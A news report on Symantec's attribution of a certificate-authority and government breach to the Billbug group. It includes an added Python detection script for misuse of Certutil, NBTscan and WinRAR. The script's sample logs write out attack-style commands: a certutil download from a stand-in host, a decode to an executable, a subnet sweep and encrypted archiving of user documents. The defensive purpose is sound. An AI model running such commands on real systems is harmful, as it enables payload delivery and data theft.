Researchers Say China State-backed Hackers Breached a Digital Certificate Authority

A suspected Chinese state-sponsored actor breached a digital
certificate authority as well as government and defense agencies
located in different countries in Asia as part of an ongoing
campaign since at least March 2022.

Symantec, by Broadcom Software, linked the attacks to an
adversarial group it tracks under the name
Billbug, citing the use of tools previously
attributed to this actor. The activity appears to be driven by
espionage and data theft, although no data is said to have been
stolen to date.

Billbug[1], also called Bronze
Elgin, Lotus Blossom, Lotus Panda, Spring Dragon[2], and Thrip[3], is an advanced
persistent threat (APT) group that is believed to operate on behalf
of Chinese interests. Primary targets include government and
military organizations in South East Asia.

Attacks mounted by the adversary in 2019 involved the use of
backdoors like Hannotog and Sagerunex[4], with the intrusions
observed in Hong Kong, Macau, Indonesia, Malaysia, the Philippines,
and Vietnam.

Both implants are designed to grant persistent remote access
to the victim network; in select cases the threat actor has also
deployed an information stealer known as Catchamas to
exfiltrate sensitive information.

“The targeting of a certificate authority is notable, as if the
attackers were able to successfully compromise it to access
certificates they could potentially use them to sign malware with a
valid certificate, and help it avoid detection on victim machines,”
Symantec researchers said[5]
in a report shared with The Hacker News.

“It could also potentially use compromised certificates to
intercept HTTPS traffic.”

The cybersecurity company, however, noted that there is no
evidence to indicate that Billbug was successful in compromising
the digital certificates. The concerned authority, it said, was
notified of the activity.

An analysis of the latest wave of attacks indicates that initial
access is likely obtained through the exploitation of
internet-facing applications, following which a combination of
bespoke and living-off-the-land tools is employed to meet the
actor's operational goals.

This toolset comprises utilities such as WinRAR, Ping, Traceroute,
NBTscan and Certutil, in addition to a backdoor capable of downloading
arbitrary files, gathering system information, and uploading
encrypted data.
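Because every utility in that list is a legitimate, signed Windows or third-party binary, the detection opportunity lies in how they are invoked rather than in their presence. The following script is an added example, not code from Symantec or the report; it runs a handful of illustrative rules over constructed, Sysmon-style process-creation lines and escalates a host when a high- and a medium-severity rule both fire there. The log format, the host and user names, the URL and the severity thresholds are all assumptions made for the example.

```python
"""Flag suspicious living-off-the-land usage in process-creation logs.

Rules cover the dual-use tools named in the article (Certutil, NBTscan,
WinRAR, Ping, Traceroute). The key=value log format and the sample lines
below are constructed for this example; adapt parse_event() to your own
EDR or Sysmon schema. Rule patterns are illustrative, not vendor detections.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class Finding:
    line_no: int
    host: str
    rule: str
    severity: str
    cmdline: str


# Constructed format: space-separated key=value pairs, values may be quoted.
_FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')


def parse_event(line: str) -> dict:
    """Parse one constructed log line into a dict of lower-cased field names."""
    fields = {}
    for m in _FIELD_RE.finditer(line):
        fields[m.group(1).lower()] = m.group(3) if m.group(3) is not None else m.group(4)
    return fields


def _basename(image: str) -> str:
    """Return the lower-cased executable name from a Windows path."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


# (rule name, severity, predicate over (exe basename, lower-cased command line))
RULES: List[Tuple[str, str, Callable[[str, str], bool]]] = [
    # certutil fetching a remote file: -urlcache combined with -f or -split
    ("certutil_download", "high",
     lambda exe, cl: exe == "certutil.exe" and "-urlcache" in cl
     and ("-f" in cl.split() or "-split" in cl)),
    # certutil used to turn a base64 blob back into a binary
    ("certutil_decode", "high",
     lambda exe, cl: exe == "certutil.exe" and "-decode" in cl.split()),
    # NetBIOS sweep of a subnet: internal discovery
    ("nbtscan_discovery", "medium",
     lambda exe, cl: exe == "nbtscan.exe"),
    # rar "a" (add) with -hp: password-encrypted archive, typical staging step
    ("winrar_encrypted_archive", "medium",
     lambda exe, cl: exe in ("rar.exe", "winrar.exe")
     and re.search(r"(^|\s)a(\s|$)", cl) is not None and "-hp" in cl),
    # ICMP tools alone are noise; recorded at low severity for correlation
    ("icmp_recon", "low",
     lambda exe, cl: exe in ("ping.exe", "tracert.exe")),
]


def scan_log(lines: List[str]) -> List[Finding]:
    """Apply every rule to every event and collect the matches in log order."""
    findings = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        exe = _basename(ev.get("image", ""))
        cmdline = ev.get("cmdline", "")
        for name, severity, predicate in RULES:
            if predicate(exe, cmdline.lower()):
                findings.append(Finding(n, ev.get("host", "?"), name, severity, cmdline))
    return findings


def escalate_hosts(findings: List[Finding]) -> List[str]:
    """Hosts where both a high- and a medium-severity rule fired (assumed threshold)."""
    severities = defaultdict(set)
    for f in findings:
        severities[f.host].add(f.severity)
    return sorted(h for h, s in severities.items() if {"high", "medium"} <= s)


# Constructed sample events: WS-014 shows a download/decode/scan/archive chain,
# WS-022 shows only benign-looking activity.
SAMPLE_LOG = [
    r'ts=2022-03-14T09:12:01Z host=WS-014 user=CORP\jdoe image="C:\Windows\System32\certutil.exe" cmdline="certutil -urlcache -split -f http://example.invalid/update.txt C:\Users\Public\u.txt"',
    r'ts=2022-03-14T09:12:09Z host=WS-014 user=CORP\jdoe image="C:\Windows\System32\certutil.exe" cmdline="certutil -decode C:\Users\Public\u.txt C:\Users\Public\u.exe"',
    r'ts=2022-03-14T09:15:44Z host=WS-014 user=CORP\jdoe image="C:\Tools\nbtscan.exe" cmdline="nbtscan -r 10.0.0.0/24"',
    r'ts=2022-03-14T09:40:02Z host=WS-014 user=CORP\jdoe image="C:\Program Files\WinRAR\Rar.exe" cmdline="Rar.exe a -hpexample -r C:\Users\Public\out.rar C:\Users\jdoe\Documents"',
    r'ts=2022-03-14T10:01:00Z host=WS-022 user=CORP\asmith image="C:\Windows\System32\PING.EXE" cmdline="ping -n 1 fileserver01"',
    r'ts=2022-03-14T10:05:00Z host=WS-022 user=CORP\asmith image="C:\Windows\System32\certutil.exe" cmdline="certutil -dump C:\Users\asmith\cert.cer"',
]

if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f"line {f.line_no} {f.host} [{f.severity}] {f.rule}: {f.cmdline}")
    print("escalate:", escalate_hosts(results))
```

Run against the sample, the script reports five findings (four on WS-014, one low-severity ping on WS-022) and escalates only WS-014; the benign `certutil -dump` on WS-022 matches nothing. The point of the correlation step is that none of the individual rules is reliable on its own, whereas the sequence of fetch, decode, scan and encrypted archiving on one host within half an hour is worth an analyst's attention.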

Also detected in the attacks were an open-source multi-hop proxy
tool called Stowaway[6]
and the Sagerunex malware, which is dropped on the machine via
Hannotog. The backdoor, for its part, is equipped to run arbitrary
commands, drop additional payloads, and siphon files of
interest.

“The ability of this actor to compromise multiple victims at
once indicates that this threat group remains a skilled and
well-resourced operator that is capable of carrying out sustained
and wide-ranging campaigns,” the researchers concluded.

“Billbug also appears to be undeterred by the possibility of
having this activity attributed to it, with it reusing tools that
have been linked to the group in the past.”

References

  1. Billbug (malpedia.caad.fkie.fraunhofer.de)
  2. Spring Dragon (securelist.com)
  3. Thrip (symantec-enterprise-blogs.security.com)
  4. Hannotog and Sagerunex (symantec-enterprise-blogs.security.com)
  5. said (symantec-enterprise-blogs.security.com)
  6. Stowaway (github.com)